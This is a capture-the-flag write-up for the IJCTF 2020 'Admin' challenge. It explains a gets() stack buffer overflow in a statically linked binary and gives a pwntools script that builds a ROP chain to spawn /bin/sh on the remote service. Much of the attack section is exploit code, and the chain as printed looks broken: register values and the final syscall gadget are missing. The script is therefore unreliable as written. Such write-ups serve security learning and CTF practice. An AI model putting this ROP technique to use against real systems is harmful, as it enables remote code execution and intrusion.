Tags: bof admin rop 

Rating: 4.5

IJCTF 2020 Admin - (100PT)

#################################################################################################### Description

This admin thinks his system is very safe Is it actually safe? I say it’s safe what do you think? nc 7002 ##################

Analysis: admin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=0ee31668ec040c05db870d1fcef7e198c0a53d37, stripped Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)

BOF in main void main(void)

{ int iVar1; undefined auStack72 [64];

puts(&UNK_004923e4); gets(auStack72); #vulnerable call to gets

iVar1 = func_0x00400498(auStack72,&UNK_004923ef); if (iVar1 == 0) { puts(&UNK_004923f5); } else { printf(&UNK_00492403,auStack72); } return; }

################## since the binary is statically linked and it has no pie , No canary. Solution : Creating a ROP chain.

rp++ found us some intresting gadgets.

pop_rdi = 0x41dc9a #: pop rdi ; ret ; pop_rax = 0x475757 #: pop rax ; ret ; pop_rsi = 0x48208c #: pop rsi ; ret ; pop_rdx = 0x4aeef2 #: pop rdx ; ret ; syscall = 0x475485 #: syscall ; ###################

we can create a rop chain which will return to gets function to store our string somewhere in the memory, and then we setup the registers for a sys_execve call,

Here is the syscall reference for x64: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

------------------------------------------- EXPLOIT ------------------------------------------ #! /usr/bin/env python3 from pwn import * context.arch='amd64' io = remote('', 7002) elf = ELF('admin')

write_mem = 0x6bb300 #the bss segment. pop_rdi = 0x41dc9a #: pop rdi ; ret ; pop_rax = 0x475757 #: pop rax ; ret ; pop_rsi = 0x48208c #: pop rsi ; ret ; pop_rdx = 0x4aeef2 #: pop rdx ; ret ; syscall = 0x475485 #: syscall ; gets = 0x410330 #gets function in binary ;

rop = flat([

'a'*72, #Padding of 72
#we return to pop rdi  gadget;
pop_rdi, #pop rdi ; ret ;
#pop the address where we want our /bin/sh string to be.
#return to gets function.
gets, #return to gets ;
#after gets we return to pop_rdi again,
write_mem, #bin_sh
pop_rax, #pop rax ; ret ;
0x3b, #syscall number for execve
pop_rsi, #pop rsi ; ret ;
pop_rdx, #pop rdx ; ret ;

]) io.sendline(rop) #we send /bin/sh io.sendline('/bin/sh') #pop the shell io.interactive()

If you need any guide on how ROP works. There is amazing information available on https://ropemporium.com

Original writeup (https://github.com/ano12-dev/IJCTF_writeups/blob/master/admin/writeup).